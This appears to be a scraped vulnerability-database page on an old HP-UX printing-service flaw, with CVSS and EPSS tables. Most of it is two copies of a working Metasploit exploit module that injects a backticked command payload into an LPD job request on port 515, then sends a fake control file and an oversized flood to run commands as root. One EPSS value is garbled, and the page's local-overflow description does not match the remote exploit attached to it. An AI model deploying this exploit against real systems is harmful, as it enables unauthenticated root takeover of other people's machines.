CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Multiple buffer overflows in lp subsystem for HP-UX 10.20 through 11.11 (11i) allow local users to cause a denial of service and possibly execute arbitrary code.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
4.6
AV:L/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
12.36%
–
–
2022-02-13
–
–
12.36%
–
–
2022-04-03
–
–
12.36%
–
–
2023-03-12
–
–
–
0.08%
–
2023-03-26
–
–
–
0.08%
–
2024-02-11
–
–
–
0.08%
–
2024-03-10
–
–
–
0.08%
–
2024-06-02
–
–
–
0.08%
–
2024-07-14
–
–
–
0.08%
–
2024-08-04
–
–
–
0.08%
–
2024-08-11
–
–
–
0.08%
–
2024-11-17
–
–
–
0.08%
–
2025-01-19
–
–
–
0.08%
–
2025-01-19
–
–
–
0.08%
–
2025-03-18
–
–
–
–
17.35%
2025-03-18
–
–
–
–
17.35,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# $Id: cleanup_exec.rb 10561 2010-10-06 00:53:45Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP-UX LPD Command Execution',
'Description' => %q{
This exploit abuses an unpublished vulnerability in the
HP-UX LPD service. This flaw allows an unauthenticated
attacker to execute arbitrary commands with the privileges
of the root user. The LPD service is only exploitable when
the address of the attacking system can be resolved by the
target. This vulnerability was silently patched with the
buffer overflow flaws addressed in HP Security Bulletin
HPSBUX0208-213.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision: 10561 $',
'References' =>
[
[ 'CVE', '2002-1473'],
[ 'OSVDB', '9638'],
[ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
],
'Platform' => [ 'unix', 'hpux' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 200,
'DisableNops' => true,
'BadChars' => "\x00\x09\x20\x2f",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 28 2002'
))
register_options(
[
Opt::RPORT(515)
], self.class)
end
def exploit
# The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
# Connect to the LPD service
connect
print_status("Sending our job request with embedded command string...")
# Send the job request with the encoded command
sock.put(
"\x02" + rand_text_alphanumeric(3) + jid +
"`" + payload.encoded + "`\n"
)
res = sock.get_once(1)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our job request")
return
end
print_status("Sending our fake control file...")
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
res = sock.get_once(1)
if !(res and res[0,1] == "\x00")
print_status("The target did not accept our control file")
return
end
print_status("Forcing an error and hijacking the cleanup routine...")
begin
sock.put(rand_text_alphanumeric(16384))
disconnect
rescue
end
end
end
Publication date : 2002-08-27 22h00 +00:00 Author : H D Moore EDB Verified : Yes
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP-UX LPD Command Execution',
'Description' => %q{
This exploit abuses an unpublished vulnerability in the
HP-UX LPD service. This flaw allows an unauthenticated
attacker to execute arbitrary commands with the privileges
of the root user. The LPD service is only exploitable when
the address of the attacking system can be resolved by the
target. This vulnerability was silently patched with the
buffer overflow flaws addressed in HP Security Bulletin
HPSBUX0208-213.
},
'Author' => [ 'hdm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2002-1473'],
[ 'OSVDB', '9638'],
[ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
],
'Platform' => ['unix', 'hpux'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 200,
'DisableNops' => true,
'BadChars' => "\x00\x09\x20\x2f",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(515)
], self.class)
end
def exploit
# The job ID is squashed down to three decimal digits
jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
# Connect to the LPD service
connect
print_status("Sending our job request with embedded command string...")
# Send the job request with the encoded command
sock.put(
"\x02" + rand_text_alphanumeric(3) + jid +
"`" + payload.encoded + "`\n"
)
res = sock.get_once(1)
if (res[0] != 0)
print_status("The target did not accept our job request")
return
end
print_status("Sending our fake control file...")
sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
res = sock.get_once(1)
if (res[0] != 0)
print_status("The target did not accept our control file")
return
end
print_status("Forcing an error and hijacking the cleanup routine...")
begin
sock.put(rand_text_alphanumeric(16384))
disconnect
rescue
end
end
end